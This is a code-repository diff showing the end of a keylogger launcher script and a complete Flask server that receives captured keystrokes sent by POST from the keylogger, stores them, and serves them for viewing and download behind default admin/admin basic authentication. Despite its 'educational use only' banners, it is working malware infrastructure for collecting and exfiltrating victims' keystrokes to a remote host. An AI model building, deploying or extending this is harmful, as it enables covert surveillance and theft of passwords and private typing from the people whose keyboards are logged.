log_file_path = args.log_file or keylogger_config.get('log_file_path', 'logs/keylog.txt')
server_url = args.server_url or keylogger_config.get('server_url', '')
batch_size = args.batch_size or keylogger_config.get('batch_size', 10)
if not server_url:
print("Error: Server URL not configured.")
print("Please set server_url in config/config.json or use --server-url argument.")
sys.exit(1)
# Create and start the keylogger
keylogger = KeyLogger(log_file_path, server_url, batch_size)
keylogger.start()
if __name__ == '__main__':
main()
src/server.py
+300
View File
@@ -0,0 +1,300 @@
"""
Web Server Module
Flask web server to view and download keylogger logs.
For educational purposes only.
"""
import os
import sys
import json
import argparse
from functools import wraps
from flask import Flask, render_template_string, send_file, request, Response
# ASCII Art Banner
BANNER = r"""
__ __ _ ____
\ \ / /__| |__ / ___| ___ _ ____ _____ _ __
\ \ /\ / / _ \ '_ \ \___ \ / _ \ '__\ \ / / _ \ '__|
\ V V / __/ |_) | ___) | __/ | \ V / __/ |
\_/\_/ \___|_.__/ |____/ \___|_| \_/ \___|_|
Github: https://github.com/Stalin-143
"""
app = Flask(__name__)
# Global configuration
CONFIG = {
'log_file_path': 'logs/keylog.txt',
'username': 'admin',
'password': 'admin'
}
def check_auth(username, password):
"""
Check if username and password are valid.
Args:
username (str): Username to check
password (str): Password to check
Returns:
bool: True if valid, False otherwise
"""
return username == CONFIG['username'] and password == CONFIG['password']
def authenticate():
"""Send a 401 response to enable basic auth."""
return Response(
'Unauthorized Access. Please log in with correct credentials.',
401,
{'WWW-Authenticate': 'Basic realm="Login Required"'}
)
def requires_auth(f):
"""
Decorator to enforce authentication on routes.
Args:
f: Function to decorate
Returns:
Decorated function
"""
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
# HTML template to display the log contents and provide a download link
HTML_TEMPLATE = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Keylogger Log Viewer</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f0f0f0;
margin: 0;
padding: 20px;
}
h1 {
color: #333;
}
pre {
background-color: #fff;
padding: 15px;
border: 1px solid #ccc;
max-height: 400px;
overflow-y: scroll;
}
.button {
padding: 10px 15px;
background-color: #4CAF50;
color: white;
text-align: center;
border: none;
cursor: pointer;
margin-top: 20px;
text-decoration: none;
display: inline-block;
}
.button:hover {
background-color: #45a049;
}
.warning {
background-color: #fff3cd;
border: 1px solid #ffc107;
padding: 10px;
margin-bottom: 20px;
border-radius: 5px;
}
</style>
</head>
<body>
<div class="warning">
<strong>⚠️ Educational Use Only:</strong> This tool is for authorized security testing and educational purposes only.
Unauthorized use is illegal.
</div>
<h1>Log File: {{ log_file_path }}</h1>
<h2>Log File Contents:</h2>
<pre>{{ log_contents }}</pre>
<a href="{{ url_for('download_log') }}" class="button">Download Log File</a>
</body>
</html>
'''
@app.route('/', methods=['GET'])
@requires_auth
def home():
"""
Display the log file contents.
Returns:
HTML page with log contents
"""
log_file_path = CONFIG['log_file_path']
if os.path.exists(log_file_path):
try:
with open(log_file_path, 'r') as file:
log_contents = file.read()
except Exception as e:
log_contents = f"Error reading log file: {e}"
else:
log_contents = "Log file not found."
return render_template_string(
HTML_TEMPLATE,
log_file_path=log_file_path,
log_contents=log_contents
)
@app.route('/download', methods=['GET'])
@requires_auth
def download_log():
"""
Download the log file.
Returns:
File download response or error message
"""
log_file_path = CONFIG['log_file_path']
if os.path.exists(log_file_path):
return send_file(log_file_path, as_attachment=True)
return "Log file not found."
@app.route('/', methods=['POST'])
def receive_log():
"""
Receive log data from keylogger.
Returns:
Success or error message
"""
try:
log_data = request.form.get('log', '')
if log_data:
log_file_path = CONFIG['log_file_path']
# Ensure log directory exists
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir, exist_ok=True)
# Append log data to file
with open(log_file_path, 'a') as f:
f.write(log_data)
return "Log received successfully", 200
return "No log data provided", 400
except Exception as e:
return f"Error: {str(e)}", 500
def load_config(config_path):
"""
Load configuration from JSON file.
Args:
config_path (str): Path to the config file
Returns:
dict: Configuration dictionary
"""
try:
with open(config_path, 'r') as f:
return json.load(f)
except FileNotFoundError:
print(f"Warning: Config file not found at {config_path}")
print("Using default configuration.")
return {}
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in config file: {e}")
return {}
def main():
"""Main function to run the web server."""
print(BANNER)
parser = argparse.ArgumentParser(
description='Web Server for Keylogger - For educational purposes only',
epilog='Always obtain explicit consent before using monitoring tools.'
)
parser.add_argument(
'--config',
default='config/config.json',
help='Path to configuration file (default: config/config.json)'
)
parser.add_argument(
'--log-file',
help='Override log file path from config'
)
parser.add_argument(
'--host',
default='0.0.0.0',
help='Host to bind to (default: 0.0.0.0)'
)
parser.add_argument(
'--port',
type=int,
default=5000,
help='Port to bind to (default: 5000)'
)
parser.add_argument(
'--debug',
action='store_true',
help='Enable debug mode'
)
args = parser.parse_args()
# Load configuration
config = load_config(args.config)
server_config = config.get('web_server', {})
# Update global config
CONFIG['log_file_path'] = args.log_file or server_config.get('log_file_path', 'logs/keylog.txt')
# Load credentials from environment variables or config
CONFIG['username'] = os.getenv('WEB_SERVER_USERNAME', 'admin')
CONFIG['password'] = os.getenv('WEB_SERVER_PASSWORD', 'admin')
if CONFIG['password'] == 'admin':
print("⚠️ WARNING: Using default password. Please set WEB_SERVER_PASSWORD environment variable.")
# Get server settings
host = args.host or server_config.get('host', '0.0.0.0')
port = args.port or server_config.get('port', 5000)
debug = args.debug or server_config.get('debug', False)
print(f"\nStarting web server on {host}:{port}")
print(f"Log file path: {CONFIG['log_file_path']}")
print(f"Username: {CONFIG['username']}")
print("-" * 50)
app.run(host=host, port=port, debug=debug)
if __name__ == '__main__':
main()